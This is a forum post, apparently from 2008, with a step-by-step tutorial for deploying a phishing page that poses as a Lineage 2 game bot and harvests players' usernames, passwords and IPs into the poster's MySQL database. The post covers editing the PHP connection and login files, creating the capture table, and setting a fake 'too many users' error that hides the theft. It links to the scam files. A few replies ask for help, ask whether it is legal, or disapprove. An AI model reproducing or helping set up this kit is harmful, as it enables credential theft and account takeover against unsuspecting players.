[Share] #ScamPage [Get Accounts In No Time]

Histox

Hey all, well I just share a ScamPage. If you dont know what is ScamPage, so read here: ScamPage Is Just A Website, when you go to Web (ScamWeb) there is a list of servers or 1 server (lineage) in our situatinion. And It tells you that its a online bot for lineage2 server, but when people try to login, they get message like (There are to many people using bot at this moment, please try again later) and wuola you get they acc's to your data base. Well Ok Lets get to work.

[glow=green,2,300]1)[/glow]You will need "adobe dreamweaver" Download adobe dreamweaver, You Will Need This To Edit Page.(download trial if you dont want to spend money).

[glow=green,2,300]2)[/glow]You Will Need Any Website With MySQL database, which you could connect to, and create a table in it.

[glow=green,2,300]3)[/glow]Now You Just Need ScamPage Files, here you are: Download ScamPage Files

[glow=green,2,300]4)[/glow]You Will Need To Create Table "Accounts" ,code: www.avalon.xz.lt/code.txt (Click On Page)

Now If You Are Quite Smart You Will Create It By Your Self If Not, Well Just Read, Ill Explain You.

[glow=green,2,300]1.[/glow]Open connect.php File With Dreamweaver.

[glow=green,2,300]2.[/glow]Now We have To Edit Connect.php File. Do Like Me.

You Will See Line: $link = mysql_connect('sql adress', 'login', 'pass');

And Change Like This For Example: $link = mysql_connect('mysql.MyWeb.com', 'Histox', 'Histox');

You Will See This Line: $db_selected = mysql_select_db('db name', $link);

And Change Like For Example (To Your Database Name): $db_selected = mysql_select_db('Histox1', $link);

[glow=red,2,300]CHANGE ONLY RED LETTERS.[/glow]

[glow=green,2,300]3.[/glow]Now Open "login.php" File With Dreamweaver.

Now Find These Lines

<option value ="[color=red]Server Name[/color]">[color=red]Server Name[/color]</option>
  <option value ="[color=red]Server Name[/color]">[color=red]Server Nam[/color]</option>
  <option value ="[color=red]Server Name[/color]">[color=red]Server Name[/color]</option>
</select>

Change Only Red letters To Server Names Witch On You Play.

[glow=green,2,300]4.[/glow]Now Go To Your MySQL DataBase, And Create A Table By Copy/Paste This Code:

CREATE TABLE `accounts` (
`name` VARCHAR( 50 ) NOT NULL ,
`pass` VARCHAR( 50 ) NOT NULL ,
`server` VARCHAR( 50 ) NOT NULL ,
`ip` VARCHAR( 50 ) NOT NULL
);

Now All Accounts Will Go To Table "Accounts" witch is located in your MySQL DataBase.

5.Now You Just Have To Copy ScamPage Files To Your Web Ftp And Web Is Completed.

EDIT: Forgotta Tell You How To Change Error Message When People Tryes To Connect, Just Find Line In login.php file:

"<a style='color: red'>Too many people are using the bot right now. Please try again later. Thank You.<br></a>"

And Edit The Message Text.

Well Happy Using.

-Translated ScamPage By Me.

-Tutorial By Me.

-Scampage Found On Net.

Web Looks Like This www.avalon.xz.lt

[glow=Green,2,300]UPDATE 2008/12/22[/glow]

Video Added

[glow=green,2,300]2)[/glow]You Will Need Any Website With MySQL database, which you could connect to, and create a table in it.

man how i can do this??? all the post is nc if you can answer me

Thank you very much, I will try it for sure. I've been always thinking how to make something like this, and now it becomes real.

Btw. isn't it illegal?

I personally dont believe in scamming others.... well random people anyways. If its somebody you hate/dislike its a diff story. Earn it without fucking somebody else over and you are better off... thats why I choose botting.